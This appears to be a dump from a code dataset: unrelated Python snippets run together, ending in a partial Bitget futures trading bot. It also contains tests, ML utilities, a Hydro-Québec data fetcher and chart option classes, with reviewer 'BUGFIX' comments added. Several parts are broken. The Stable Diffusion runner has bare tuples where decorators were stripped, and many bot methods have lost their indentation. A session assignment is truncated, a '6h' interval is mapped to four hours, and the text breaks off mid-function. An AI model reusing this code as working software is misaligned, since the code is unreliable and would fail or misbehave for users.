code stringlengths 281 23.7M |
|---|
def write_json(path: FilePath, data: JSONInput, indent: int = 2) -> None:
    """Serialize *data* as JSON and write it to *path*.

    The special path ``'-'`` writes to stdout instead of a file.
    """
    serialized = json_dumps(data, indent=indent)
    if path == '-':
        print(serialized)
        return
    out_path = force_path(path, require_exists=False)
    with out_path.open('w', encoding='utf8') as handle:
        handle.write(serialized)
def fetch_production(zone_key: ZoneKey = ZoneKey('CA-QC'), session: (Session | None) = None, target_datetime: (datetime | None) = None, logger: Logger = getLogger(__name__)) -> list[dict[str, Any]]:
    """Fetch Hydro-Québec production data and return normalized production events.

    Only rows with a string ISO-format date, a timestamp not in the future,
    and a positive 'total' are emitted.
    """
    data = _fetch_quebec_production(session)
    production = ProductionBreakdownList(logger)
    now = datetime.now(tz=TIMEZONE)
    for elem in data:
        values = elem['valeurs']
        raw_date = elem['date']
        if not isinstance(raw_date, str):
            # BUGFIX: the original only assigned `timestamp` for string dates but
            # then used it unconditionally, so a non-string date reused the
            # previous row's timestamp (or raised NameError on the first row).
            continue
        timestamp = datetime.fromisoformat(raw_date).replace(tzinfo=TIMEZONE)
        if timestamp <= now and values.get('total', 0) > 0:
            production.append(
                zoneKey=zone_key,
                datetime=timestamp,
                production=ProductionMix(
                    biomass=values.get('autres', 0),
                    hydro=values.get('hydraulique', 0),
                    gas=values.get('thermique', 0),
                    solar=values.get('solaire', 0),
                    wind=values.get('eolien', 0),
                ),
                source=SOURCE,
            )
    return production.to_list()
class OptionPlotoptionsItemEvents(Options):
    """Event-handler options for plotOptions.item.

    BUGFIX: each event originally defined a getter and a setter as two plain
    methods with the same name and no decorators, so the second definition
    silently replaced the first and the getters were unreachable. Restore the
    intended ``@property`` / ``@<name>.setter`` pairs (the decorators were
    most likely lost in extraction).
    """

    @property
    def afterAnimate(self):
        return self._config_get(None)

    @afterAnimate.setter
    def afterAnimate(self, value: Any):
        self._config(value, js_type=False)

    @property
    def checkboxClick(self):
        return self._config_get(None)

    @checkboxClick.setter
    def checkboxClick(self, value: Any):
        self._config(value, js_type=False)

    @property
    def click(self):
        return self._config_get(None)

    @click.setter
    def click(self, value: Any):
        self._config(value, js_type=False)

    @property
    def hide(self):
        return self._config_get(None)

    @hide.setter
    def hide(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mouseOut(self):
        return self._config_get(None)

    @mouseOut.setter
    def mouseOut(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mouseOver(self):
        return self._config_get(None)

    @mouseOver.setter
    def mouseOver(self, value: Any):
        self._config(value, js_type=False)

    @property
    def show(self):
        return self._config_get(None)

    @show.setter
    def show(self, value: Any):
        self._config(value, js_type=False)
# NOTE(review): the bare tuples below are the argument lists of stripped
# decorator calls (the `()` and option signatures match a CLI framework such
# as click: @command() plus one @option(...) per line). As written they are
# not valid standalone Python — confirm and restore the decorators from the
# original script.
()
('--local-dir', default='./tmp/diffusers-pipeline/stabilityai/stable-diffusion-v2', help='the local diffusers pipeline directory')
('--width', default=512, help='Width of generated image')
('--height', default=512, help='Height of generated image')
('--batch', default=1, help='Batch size of generated image')
('--prompt', default='A vision of paradise, Unreal Engine', help='prompt')
('--negative_prompt', default='', help='prompt')
('--benchmark', type=bool, default=False, help='run stable diffusion e2e benchmark')
def run(local_dir, width, height, batch, prompt, negative_prompt, benchmark):
    """Generate images with a local AIT-compiled Stable Diffusion pipeline.

    Saves one PNG per batch element; optionally benchmarks end-to-end latency.
    """
    # Load the pipeline in fp16 on CUDA, with an Euler discrete scheduler.
    pipe = StableDiffusionAITPipeline.from_pretrained(local_dir, scheduler=EulerDiscreteScheduler.from_pretrained(local_dir, subfolder='scheduler'), revision='fp16', torch_dtype=torch.float16).to('cuda')
    # Replicate the prompt across the batch.
    prompt = ([prompt] * batch)
    with torch.autocast('cuda'):
        images = pipe(prompt, height, width).images
        if benchmark:
            # Average latency over 10 runs, reported in ms.
            t = benchmark_torch_function(10, pipe, prompt, height=height, width=width)
            print(f'sd e2e: width={width}, height={height}, batchsize={batch}, latency={t} ms')
    for (i, image) in enumerate(images):
        image.save(f'example_ait_{i}.png')
def test_slash_no_dbl_prepare(casper, concise_casper, funded_account, validation_key, deposit_amount, induct_validator, mk_vote, fake_hash):
    """Two votes for the same epoch but different target hashes are slashable:
    the full deposit is burned and the validator exits next dynasty."""
    validator_index = induct_validator(funded_account, validation_key, deposit_amount)
    assert concise_casper.total_curdyn_deposits_in_wei() == deposit_amount

    target_epoch = concise_casper.current_epoch()
    source_epoch = concise_casper.recommended_source_epoch()
    honest_vote = mk_vote(validator_index, concise_casper.recommended_target_hash(), target_epoch, source_epoch, validation_key)
    equivocating_vote = mk_vote(validator_index, fake_hash, target_epoch, source_epoch, validation_key)

    next_dynasty = concise_casper.dynasty() + 1
    assert concise_casper.dynasty_wei_delta(concise_casper.dynasty() + 1) == 0
    assert concise_casper.slashable(honest_vote, equivocating_vote)

    casper.functions.slash(honest_vote, equivocating_vote).transact()

    epoch_after_slash = concise_casper.current_epoch()
    assert concise_casper.total_slashed(epoch_after_slash) == deposit_amount
    assert concise_casper.dynasty_wei_delta(next_dynasty) == (-deposit_amount) / concise_casper.deposit_scale_factor(epoch_after_slash)
    assert concise_casper.validators__is_slashed(validator_index)
    assert concise_casper.validators__end_dynasty(validator_index) == next_dynasty
    assert concise_casper.validators__total_deposits_at_logout(validator_index) == deposit_amount
def test_request_form_context_manager(test_client_factory):
    """POSTed form data round-trips through Request.form() used as an async context manager."""
    async def app(scope, receive, send):
        request = Request(scope, receive)
        async with request.form() as form:
            response = JSONResponse({'form': dict(form)})
        await response(scope, receive, send)

    client = test_client_factory(app)
    payload = {'abc': '123 '}
    response = client.post('/', data=payload)
    assert response.json() == {'form': payload}
def valid(valid_loader, model, logger):
    """Run one evaluation pass over *valid_loader* and return the average loss."""
    model.eval()
    loss_meter = AverageMeter()
    for padded_input, padded_target, input_lengths in tqdm(valid_loader):
        padded_input = padded_input.to(device)
        padded_target = padded_target.to(device)
        input_lengths = input_lengths.to(device)
        with torch.no_grad():
            pred, gold = model(padded_input, input_lengths, padded_target)
            loss, _n_correct = cal_performance(pred, gold, smoothing=args.label_smoothing)
        loss_meter.update(loss.item())
    logger.info('\nValidation Loss {loss.val:.5f} ({loss.avg:.5f})\n'.format(loss=loss_meter))
    return loss_meter.avg
@dataclasses.dataclass
class BuilderModule:
    """One module from a build manifest, with an optional parent module and
    its collected sources.

    BUGFIX: the class used ``dataclasses.field(...)`` and a ``cls``-first
    constructor without the ``@dataclasses.dataclass`` / ``@classmethod``
    decorators (most likely stripped in extraction); without them ``field()``
    leaves a raw Field object as a shared class attribute and calling
    ``BuilderModule.from_manifest(...)`` would pass the path as ``cls``.
    Also replaced ``lambda: []`` with the idiomatic ``list`` factory.
    """
    name: str                                      # module name from the manifest
    module: t.Dict[str, t.Any]                     # raw manifest entry
    module_path: str                               # where the manifest entry came from
    parent: t.Optional["BuilderModule"] = None     # enclosing module, if nested
    sources: t.List[BuilderSource] = dataclasses.field(default_factory=list)

    @classmethod
    def from_manifest(cls: t.Type[_BM], module_path: str, module: t.Dict, parent: t.Optional["BuilderModule"] = None) -> _BM:
        """Build an instance from a manifest entry dict."""
        return cls(name=module['name'], module=module, module_path=module_path, parent=parent)

    def __str__(self):
        return self.name
class padded_dense_to_jagged(Operator):
    """Operator converting a padded dense Tensor into a jagged Tensor.

    The output's first dimension is ``total_length`` (total number of jagged
    elements); trailing inner dimensions are carried over from the input.
    """

    def __init__(self, total_length: IntVar):
        # A JaggedIntVar already carries the total length; unwrap it first.
        if isinstance(total_length, JaggedIntVar):
            total_length = total_length.total_length()
        # NOTE(review): exact-type check rather than isinstance — appears
        # deliberate (rejects IntVar subclasses); confirm before changing.
        if (type(total_length) != IntVar):
            raise TypeError(f'total_length must be IntVar, but got {type(total_length).__name__}.')
        super().__init__()
        self._attrs['op'] = 'padded_dense_to_jagged'
        self._attrs['total_length'] = total_length

    def _infer_shape(self, x: Tensor, offsets_list: List[Tensor]) -> List[IntVar]:
        # Output shape: [total_length, *inner_dims]. The batch dim plus one
        # sequence dim per offsets tensor are collapsed into total_length.
        inner_shape = x.shape()[(1 + len(offsets_list)):]
        return ([self._attrs['total_length']] + inner_shape)

    def _get_op_attributes(self):
        # Attributes needed to reconstruct this op.
        return {'total_length': self._attrs['total_length']}

    def _args_for_pseudo_code(self):
        return [f"total_length={self._attrs['total_length']}"]

    def __call__(self, x: Tensor, offsets_list: List[Tensor]) -> Tensor:
        """Validate inputs, create the dense output Tensor, and wrap it as jagged.

        Raises ValueError on empty offsets or insufficient rank, TypeError if
        the batch dimension is not an IntVar.
        """
        x_shape = x.shape()
        if (not offsets_list):
            raise ValueError('At least one offsets Tensor must be specified.')
        # x must have: 1 batch dim + len(offsets_list) sequence dims + >=1 inner dim.
        if (len(x_shape) < (len(offsets_list) + 2)):
            raise ValueError(f'The input dense Tensor x must have at least len(offsets_list) + 2 dimensions: one batch dimension, as many sequence dimensions as len(offsets_list), and at least one inner dimension, but len(offsets_list)={len(offsets_list)!r}, x_shape={x_shape!r}.')
        if (type(x_shape[0]) != IntVar):
            raise TypeError(f'x.shape()[0] must be IntVar, but got {type(x_shape[0]).__name__}.')
        # Wire this op into the graph.
        self._attrs['inputs'] = [x, *offsets_list]
        self._set_depth()
        output_shape = self._infer_shape(x, offsets_list)
        source = Tensor(output_shape, src_ops={self}, dtype=x._attrs['dtype'])
        self._attrs['outputs'] = [source]
        # Attach jagged metadata: each padded sequence dim becomes a JaggedDim
        # bounded above by that (max) dimension.
        jagged_output = make_jagged(batch_dim=x_shape[0], jagged_dims=[JaggedDim(min_value=0, max_value=dim) for dim in x_shape[1:(1 + len(offsets_list))]])(source=source, offsets_list=offsets_list)
        self._attrs['jagged_int_var'] = jagged_output._attrs['shape'][0]
        return jagged_output

    def gen_function(self) -> str:
        """Look up and invoke the backend codegen function registered for this op."""
        target = Target.current()
        func = registry.get(f"{target.name()}.{self._attrs['op']}.gen_function")
        return func(self._attrs)
class GradientClipping(NetModifier):
    """Net modifier that clips parameter gradients, either by norm or by value."""

    L1_NORM = 'l1_norm'
    L2_NORM = 'l2_norm'
    BY_NORM = 'by_norm'
    BY_VALUE = 'by_value'
    GRAD_CLIP_METHODS = [BY_NORM, BY_VALUE]
    CLIP_GRADIENT_NORM_TYPES = [L2_NORM, L1_NORM]

    def __init__(self, grad_clip_method, clip_norm_type='l2_norm', clip_threshold=0.1, use_parameter_norm=False, compute_norm_ratio=False, clip_max=1, clip_min=(- 1), blobs_to_include=None, blobs_to_exclude=None):
        """
        Args:
            grad_clip_method: one of GRAD_CLIP_METHODS ('by_norm' or 'by_value').
            clip_norm_type: 'l1_norm' or 'l2_norm'; only used with 'by_norm'.
            clip_threshold: scaling threshold for norm-based clipping.
            use_parameter_norm: also scale by the parameter's own norm.
            compute_norm_ratio: additionally emit a grad_norm/param_norm blob.
            clip_max, clip_min: bounds used with 'by_value'.
            blobs_to_include, blobs_to_exclude: optional blob-name filters.
        """
        # BUGFIX: this message previously formatted clip_norm_type instead of
        # the value actually being validated (grad_clip_method).
        assert (grad_clip_method in self.GRAD_CLIP_METHODS), 'This method of clipping, {}, has not been implemented.'.format(grad_clip_method)
        if (clip_norm_type is not None):
            assert (clip_norm_type in self.CLIP_GRADIENT_NORM_TYPES), 'This method of clipping, {}, has not been implemented.'.format(clip_norm_type)
        self.grad_clip_method = grad_clip_method
        self.clip_norm_type = clip_norm_type
        self.clip_threshold = float(clip_threshold)
        self.use_parameter_norm = use_parameter_norm
        self.compute_norm_ratio = compute_norm_ratio
        self.clip_max = float(clip_max)
        self.clip_min = float(clip_min)
        self.blobs_to_include = blobs_to_include
        self.blobs_to_exclude = blobs_to_exclude

    def modify_net(self, net, init_net=None, grad_map=None, blob_to_device=None, modify_output_record=False):
        """Insert clipping ops into *net* for every selected (param, grad) pair.

        GradientSlice (sparse) gradients are skipped.
        """
        assert (grad_map is not None)
        # Select which param->grad entries to clip.
        final_param_map = {}
        if (self.blobs_to_include is None):
            final_param_map = grad_map
        else:
            for blob in self.blobs_to_include:
                param = core.BlobReference(blob)
                if (not net.BlobIsDefined(param)):
                    raise Exception('param {0} is not defined in net {1}'.format(param, net.Name()))
                final_param_map[param] = grad_map[param]
        if (self.blobs_to_exclude is not None):
            for blob in self.blobs_to_exclude:
                final_param_map.pop(blob, None)
        for (param, grad) in final_param_map.items():
            # Sparse gradients are not supported by these clipping ops.
            if isinstance(grad, core.GradientSlice):
                continue
            if (self.grad_clip_method == self.BY_NORM):
                if (self.clip_norm_type == self.L2_NORM):
                    p = 2
                elif (self.clip_norm_type == self.L1_NORM):
                    p = 1
                grad_norm = net.LpNorm([grad], net.NextScopedBlob(prefix=(str(grad) + '_l{}_norm'.format(p))), p=p)
                if (p == 2):
                    # LpNorm returns the squared L2 norm; take the square root.
                    grad_norm = net.Pow([grad_norm], exponent=0.5)
                op_inputs = [grad, grad_norm]
                if self.use_parameter_norm:
                    param_norm = net.LpNorm([param], net.NextScopedBlob(prefix=(str(param) + '_l{}_norm'.format(p))), p=p)
                    if (p == 2):
                        param_norm = net.Pow([param_norm], exponent=0.5)
                    op_inputs.append(param_norm)
                    if self.compute_norm_ratio:
                        # Diagnostic blob: grad_norm / param_norm.
                        net.Div([grad_norm, param_norm], [net.NextScopedBlob(prefix=(str(param) + '_norm_ratio'))])
                net.ClipTensorByScaling(op_inputs, [grad], threshold=self.clip_threshold)
            elif (self.grad_clip_method == self.BY_VALUE):
                net.Clip([grad], [grad], max=self.clip_max, min=self.clip_min)
class BitgetBot(Bot):
    """Passivbot exchange adapter for Bitget USDT-M / coin-M perpetual futures."""

    def __init__(self, config: dict):
        """Set exchange constants and REST/websocket endpoint tables, then run Bot.__init__."""
        self.is_logged_into_user_stream = False
        self.exchange = 'bitget'
        # Bitget batch-endpoint limits.
        self.max_n_orders_per_batch = 50
        self.max_n_cancellations_per_batch = 60
        super().__init__(config)
        # BUGFIX: this line was a truncated, unterminated string literal in the
        # original; restored to Bitget's REST base URL.
        self.base_endpoint = 'https://api.bitget.com'
        self.endpoints = {'exchange_info': '/api/mix/v1/market/contracts', 'funds_transfer': '/api/spot/v1/wallet/transfer-v2', 'position': '/api/mix/v1/position/singlePosition', 'balance': '/api/mix/v1/account/accounts', 'ticker': '/api/mix/v1/market/ticker', 'tickers': '/api/mix/v1/market/tickers', 'open_orders': '/api/mix/v1/order/current', 'open_orders_all': '/api/mix/v1/order/marginCoinCurrent', 'create_order': '/api/mix/v1/order/placeOrder', 'batch_orders': '/api/mix/v1/order/batch-orders', 'batch_cancel_orders': '/api/mix/v1/order/cancel-batch-orders', 'cancel_order': '/api/mix/v1/order/cancel-order', 'ticks': '/api/mix/v1/market/fills', 'fills': '/api/mix/v1/order/fills', 'fills_detailed': '/api/mix/v1/order/history', 'ohlcvs': '/api/mix/v1/market/candles', 'websocket_market': 'wss://ws.bitget.com/mix/v1/stream', 'websocket_user': 'wss://ws.bitget.com/mix/v1/stream', 'set_margin_mode': '/api/mix/v1/account/setMarginMode', 'set_leverage': '/api/mix/v1/account/setLeverage'}
        # Map passivbot (side, position_side) to Bitget hedge-mode order sides.
        self.order_side_map = {'buy': {'long': 'open_long', 'short': 'close_short'}, 'sell': {'long': 'close_long', 'short': 'open_short'}}
        self.fill_side_map = {'burst_close_long': 'sell', 'burst_close_short': 'buy', 'close_long': 'sell', 'open_long': 'buy', 'close_short': 'buy', 'open_short': 'sell'}
        # NOTE(review): `aio` looks like a truncated aiohttp client-session
        # assignment (e.g. aiohttp.ClientSession()) — confirm against upstream.
        self.session = aio
    def init_market_type(self):
        """Derive Bitget product type and market settings from the symbol suffix.

        Appends the Bitget contract suffix (_UMCBL / _DMCBL) to self.symbol.
        Raises NotImplementedError for unrecognized suffixes.
        """
        # Keep the plain symbol for websocket subscriptions.
        self.symbol_stripped = self.symbol
        if self.symbol.endswith('USDT'):
            print('linear perpetual')
            self.symbol += '_UMCBL'
            self.market_type += '_linear_perpetual'
            self.product_type = 'umcbl'
            self.inverse = self.config['inverse'] = False
            self.min_cost = self.config['min_cost'] = 5.5
        elif self.symbol.endswith('USD'):
            print('inverse perpetual')
            self.symbol += '_DMCBL'
            self.market_type += '_inverse_perpetual'
            self.product_type = 'dmcbl'
            # NOTE(review): inverse is False even for the coin-margined branch;
            # fetch_position converts the dmcbl balance via price instead —
            # confirm this is intentional.
            self.inverse = self.config['inverse'] = False
            self.min_cost = self.config['min_cost'] = 6.0
        else:
            raise NotImplementedError('not yet implemented')
    async def _init(self):
        """Resolve contract metadata for this symbol, then finish base-class init."""
        self.init_market_type()
        info = (await self.fetch_exchange_info())
        # for/else: `e` stays bound to the matching contract after the loop.
        for e in info['data']:
            if (e['symbol'] == self.symbol):
                break
        else:
            raise Exception(f'symbol missing {self.symbol}')
        self.coin = e['baseCoin']
        self.quote = e['quoteCoin']
        # price_step = 10^-pricePlace * priceEndStep, rounded to kill float noise.
        self.price_step = self.config['price_step'] = round_(((10 ** (- int(e['pricePlace']))) * int(e['priceEndStep'])), 1e-12)
        self.price_rounding = int(e['pricePlace'])
        self.qty_step = self.config['qty_step'] = float(e['sizeMultiplier'])
        self.min_qty = self.config['min_qty'] = float(e['minTradeNum'])
        # Coin-margined (dmcbl) contracts margin in the base coin; linear in the quote.
        self.margin_coin = (self.coin if (self.product_type == 'dmcbl') else self.quote)
        (await super()._init())
        (await self.init_order_book())
        (await self.update_position())
async def fetch_exchange_info(self):
info = (await self.public_get(self.endpoints['exchange_info'], params={'productType': self.product_type}))
return info
async def fetch_ticker(self, symbol=None):
ticker = (await self.public_get(self.endpoints['ticker'], params={'symbol': (self.symbol if (symbol is None) else symbol)}))
return {'symbol': ticker['data']['symbol'], 'bid': float(ticker['data']['bestBid']), 'ask': float(ticker['data']['bestAsk']), 'last': float(ticker['data']['last'])}
async def fetch_tickers(self, product_type=None):
tickers = (await self.public_get(self.endpoints['tickers'], params={'productType': (self.product_type if (product_type is None) else product_type)}))
return [{'symbol': ticker['symbol'], 'bid': (0.0 if (ticker['bestBid'] is None) else float(ticker['bestBid'])), 'ask': (0.0 if (ticker['bestAsk'] is None) else float(ticker['bestAsk'])), 'last': (0.0 if (ticker['last'] is None) else float(ticker['last']))} for ticker in tickers['data']]
    async def init_order_book(self):
        """Seed self.ob (bid/ask) and self.price from a ticker snapshot.

        Returns True on success, False on any error.
        """
        ticker = None
        try:
            ticker = (await self.fetch_ticker())
            self.ob = [ticker['bid'], ticker['ask']]
            self.price = ticker['last']
            return True
        except Exception as e:
            logging.error(f'error updating order book {e}')
            print_async_exception(ticker)
            return False
async def fetch_open_orders(self) -> [dict]:
fetched = (await self.private_get(self.endpoints['open_orders'], {'symbol': self.symbol}))
return [{'order_id': elm['orderId'], 'custom_id': elm['clientOid'], 'symbol': elm['symbol'], 'price': float(elm['price']), 'qty': float(elm['size']), 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched['data']]
async def fetch_open_orders_all(self) -> [dict]:
fetched = (await self.private_get(self.endpoints['open_orders_all'], {'productType': self.product_type}))
return [{'order_id': elm['orderId'], 'custom_id': elm['clientOid'], 'symbol': elm['symbol'], 'price': float(elm['price']), 'qty': float(elm['size']), 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched['data']]
async def public_get(self, url: str, params: dict={}) -> dict:
result = None
response_ = None
try:
async with self.session.get((self.base_endpoint + url), params=params) as response:
response_ = response
result = (await response.text())
return json.loads(result)
except Exception as e:
logging.error(f'error with json decoding {url} {params} {e}')
traceback.print_exc()
print_async_exception(result)
print_async_exception(response_)
raise Exception
    async def private_(self, type_: str, base_endpoint: str, url: str, params: dict={}, json_: bool=False) -> dict:
        """Make a signed REST request ('get' or 'post') against Bitget.

        Signature: base64(HMAC-SHA256(secret, timestamp + METHOD + path[+body])),
        sent with key/passphrase headers.
        NOTE(review): the `json_` flag is accepted but never read here — confirm.
        """
        def stringify(x):
            # Bitget expects bools/floats/ints as strings; recurse into containers.
            if (type(x) == bool):
                return ('true' if x else 'false')
            elif (type(x) == float):
                return format_float(x)
            elif (type(x) == int):
                return str(x)
            elif (type(x) == list):
                return [stringify(y) for y in x]
            elif (type(x) == dict):
                return {k: stringify(v) for (k, v) in x.items()}
            else:
                return x
        # Millisecond timestamp used both in the signature and the header.
        timestamp = int((time() * 1000))
        params = {k: stringify(v) for (k, v) in params.items()}
        if (type_ == 'get'):
            # GET: query string (sorted keys) is part of the signed path.
            url = ((url + '?') + urlencode(sort_dict_keys(params)))
            to_sign = ((str(timestamp) + type_.upper()) + url)
        elif (type_ == 'post'):
            # POST: JSON body is appended to the signing payload.
            to_sign = (((str(timestamp) + type_.upper()) + url) + json.dumps(params))
        signature = base64.b64encode(hmac.new(self.secret.encode('utf-8'), to_sign.encode('utf-8'), digestmod='sha256').digest()).decode('utf-8')
        header = {'Content-Type': 'application/json', 'locale': 'en-US', 'ACCESS-KEY': self.key, 'ACCESS-SIGN': signature, 'ACCESS-TIMESTAMP': str(timestamp), 'ACCESS-PASSPHRASE': self.passphrase}
        if (type_ == 'post'):
            async with getattr(self.session, type_)((base_endpoint + url), headers=header, data=json.dumps(params)) as response:
                result = (await response.text())
        elif (type_ == 'get'):
            async with getattr(self.session, type_)((base_endpoint + url), headers=header) as response:
                result = (await response.text())
        return json.loads(result)
async def private_get(self, url: str, params: dict={}, base_endpoint: str=None) -> dict:
return (await self.private_(type_='get', base_endpoint=(self.base_endpoint if (base_endpoint is None) else base_endpoint), url=url, params=params))
async def private_post(self, url: str, params: dict={}, base_endpoint: str=None) -> dict:
return (await self.private_(type_='post', base_endpoint=(self.base_endpoint if (base_endpoint is None) else base_endpoint), url=url, params=params))
async def transfer_from_derivatives_to_spot(self, coin: str, amount: float):
params = {'coin': 'USDT', 'amount': str(amount), 'from_account_type': 'mix_usdt', 'to_account_type': 'spot'}
return (await self.private_('post', self.base_endpoint, self.endpoints['funds_transfer'], params=params, json_=True))
async def get_server_time(self):
now = (await self.public_get('/api/spot/v1/public/time'))
return float(now['data'])
    async def fetch_position(self) -> dict:
        """Fetch position and balance concurrently; return a normalized dict,
        or None on any error.

        For coin-margined (dmcbl) contracts the available balance is converted
        to quote terms using the mean of the EMAs, falling back to the order
        book when the EMAs are not yet warmed up.
        """
        position = {'long': {'size': 0.0, 'price': 0.0, 'liquidation_price': 0.0}, 'short': {'size': 0.0, 'price': 0.0, 'liquidation_price': 0.0}, 'wallet_balance': 0.0}
        (fetched_pos, fetched_balance) = (None, None)
        try:
            (fetched_pos, fetched_balance) = (await asyncio.gather(self.private_get(self.endpoints['position'], {'symbol': self.symbol, 'marginCoin': self.margin_coin}), self.private_get(self.endpoints['balance'], {'productType': self.product_type})))
            for elm in fetched_pos['data']:
                if (elm['holdSide'] == 'long'):
                    position['long'] = {'size': round_(float(elm['total']), self.qty_step), 'price': (0.0 if (elm['averageOpenPrice'] is None) else float(elm['averageOpenPrice'])), 'liquidation_price': (0.0 if (elm['liquidationPrice'] is None) else float(elm['liquidationPrice']))}
                elif (elm['holdSide'] == 'short'):
                    # Short size is reported positive by Bitget; normalize to negative.
                    position['short'] = {'size': (- abs(round_(float(elm['total']), self.qty_step))), 'price': (0.0 if (elm['averageOpenPrice'] is None) else float(elm['averageOpenPrice'])), 'liquidation_price': (0.0 if (elm['liquidationPrice'] is None) else float(elm['liquidationPrice']))}
            for elm in fetched_balance['data']:
                if (elm['marginCoin'] == self.margin_coin):
                    if (self.product_type == 'dmcbl'):
                        all_emas = (list(self.emas_long) + list(self.emas_short))
                        if any(((ema == 0.0) for ema in all_emas)):
                            # EMAs not initialized yet; use best bid/ask instead.
                            all_emas = self.ob
                        position['wallet_balance'] = (float(elm['available']) * np.mean(all_emas))
                    else:
                        position['wallet_balance'] = float(elm['available'])
                    break
            return position
        except Exception as e:
            logging.error(f'error fetching pos or balance {e}')
            print_async_exception(fetched_pos)
            print_async_exception(fetched_balance)
            traceback.print_exc()
            return None
async def execute_orders(self, orders: [dict]) -> [dict]:
if (len(orders) == 0):
return []
if (len(orders) == 1):
return [(await self.execute_order(orders[0]))]
return (await self.execute_batch_orders(orders))
    async def execute_order(self, order: dict) -> dict:
        """Place a single order.

        Returns the normalized order dict on success, a (response, order) tuple
        when the API returns no data, or {} on exception.
        """
        o = None
        try:
            params = {'symbol': self.symbol, 'marginCoin': self.margin_coin, 'size': str(order['qty']), 'side': self.order_side_map[order['side']][order['position_side']], 'orderType': order['type'], 'presetTakeProfitPrice': '', 'presetStopLossPrice': ''}
            if (params['orderType'] == 'limit'):
                # Limit orders are placed maker-only.
                params['timeInForceValue'] = 'post_only'
                params['price'] = str(order['price'])
            else:
                params['timeInForceValue'] = 'normal'
            # Client order id: broker code + caller's custom id + time/random suffix.
            random_str = f'{str(int((time() * 1000)))[(- 6):]}_{int((np.random.random() * 10000))}'
            custom_id = (order['custom_id'] if ('custom_id' in order) else '0')
            params['clientOid'] = f'{self.broker_code}#{custom_id}_{random_str}'
            o = (await self.private_post(self.endpoints['create_order'], params))
            if o['data']:
                return {'symbol': self.symbol, 'side': order['side'], 'order_id': o['data']['orderId'], 'position_side': order['position_side'], 'type': order['type'], 'qty': order['qty'], 'price': order['price']}
            else:
                # NOTE(review): inconsistent return type (tuple) on this path —
                # callers must handle it; confirm intended.
                return (o, order)
        except Exception as e:
            print(f'error executing order {order} {e}')
            print_async_exception(o)
            traceback.print_exc()
            return {}
    async def execute_batch_orders(self, orders: [dict]) -> [dict]:
        """Place several orders via the batch endpoint.

        Returns the normalized orders matched back to the API response by
        client order id; [] on exception.
        """
        executed = None
        try:
            to_execute = []
            orders_with_custom_ids = []
            for order in orders:
                params = {'size': str(order['qty']), 'side': self.order_side_map[order['side']][order['position_side']], 'orderType': order['type'], 'presetTakeProfitPrice': '', 'presetStopLossPrice': ''}
                if (params['orderType'] == 'limit'):
                    # Limit orders are placed maker-only.
                    params['timeInForceValue'] = 'post_only'
                    params['price'] = str(order['price'])
                else:
                    params['timeInForceValue'] = 'normal'
                # Unique client order id; also written back into the order dict
                # so the response can be matched below.
                random_str = f'{str(int((time() * 1000)))[(- 6):]}_{int((np.random.random() * 10000))}'
                custom_id = (order['custom_id'] if ('custom_id' in order) else '0')
                params['clientOid'] = order['custom_id'] = f'{self.broker_code}#{custom_id}_{random_str}'
                orders_with_custom_ids.append({**order, **{'symbol': self.symbol}})
                to_execute.append(params)
            executed = (await self.private_post(self.endpoints['batch_orders'], {'symbol': self.symbol, 'marginCoin': self.margin_coin, 'orderDataList': to_execute}))
            formatted = []
            for ex in executed['data']['orderInfo']:
                to_add = {'order_id': ex['orderId'], 'custom_id': ex['clientOid']}
                # Match the response entry back to the submitted order.
                for elm in orders_with_custom_ids:
                    if (elm['custom_id'] == ex['clientOid']):
                        to_add.update(elm)
                        formatted.append(to_add)
                        break
            return formatted
        except Exception as e:
            print(f'error executing order {executed} {e}')
            print_async_exception(executed)
            traceback.print_exc()
            return []
    async def execute_cancellations(self, orders: [dict]) -> [dict]:
        """Cancel the given orders via the batch-cancel endpoint.

        Returns the cancelled orders matched by order id; [] on no input or error.
        """
        if (not orders):
            return []
        cancellations = []
        # All orders in one batch must share a symbol; take it from the first.
        symbol = (orders[0]['symbol'] if ('symbol' in orders[0]) else self.symbol)
        try:
            cancellations = (await self.private_post(self.endpoints['batch_cancel_orders'], {'symbol': symbol, 'marginCoin': self.margin_coin, 'orderIds': [order['order_id'] for order in orders]}))
            formatted = []
            for oid in cancellations['data']['order_ids']:
                to_add = {'order_id': oid}
                # Match the cancelled id back to the submitted order.
                for order in orders:
                    if (order['order_id'] == oid):
                        to_add.update(order)
                        formatted.append(to_add)
                        break
            return formatted
        except Exception as e:
            logging.error(f'error cancelling orders {orders} {e}')
            print_async_exception(cancellations)
            traceback.print_exc()
            return []
    async def fetch_account(self):
        """Spot account fetch — disabled for Bitget."""
        raise NotImplementedError('not implemented')
        # NOTE(review): everything below is unreachable due to the raise above,
        # and references an endpoint key ('spot_balance') and attribute
        # (spot_base_endpoint) not set in __init__ — likely leftover code.
        try:
            resp = (await self.private_get(self.endpoints['spot_balance'], base_endpoint=self.spot_base_endpoint))
            return resp['result']
        except Exception as e:
            print('error fetching account: ', e)
            return {'balances': []}
async def fetch_ticks(self, from_id: int=None, do_print: bool=True):
params = {'symbol': self.symbol, 'limit': 100}
try:
ticks = (await self.public_get(self.endpoints['ticks'], params))
except Exception as e:
print('error fetching ticks', e)
return []
try:
trades = [{'trade_id': int(tick['tradeId']), 'price': float(tick['price']), 'qty': float(tick['size']), 'timestamp': float(tick['timestamp']), 'is_buyer_maker': (tick['side'] == 'sell')} for tick in ticks['data']]
if do_print:
print_(['fetched trades', self.symbol, trades[0]['trade_id'], ts_to_date((float(trades[0]['timestamp']) / 1000))])
except:
trades = []
if do_print:
print_(['fetched no new trades', self.symbol])
return trades
async def fetch_ohlcvs(self, symbol: str=None, start_time: int=None, interval='1m'):
interval_map = {'1m': ('1m', 60), '3m': ('3m', (60 * 3)), '5m': ('5m', (60 * 5)), '15m': ('15m', (60 * 15)), '30m': ('30m', (60 * 30)), '1h': ('1H', (60 * 60)), '2h': ('2H', ((60 * 60) * 2)), '4h': ('4H', ((60 * 60) * 4)), '6h': ('6H', ((60 * 60) * 4)), '12h': ('12H', ((60 * 60) * 12)), '1d': ('1D', ((60 * 60) * 24)), '3d': ('3D', (((60 * 60) * 24) * 3)), '1w': ('1W', (((60 * 60) * 24) * 7)), '1M': ('1M', (((60 * 60) * 24) * 30))}
assert (interval in interval_map), f'unsupported interval {interval}'
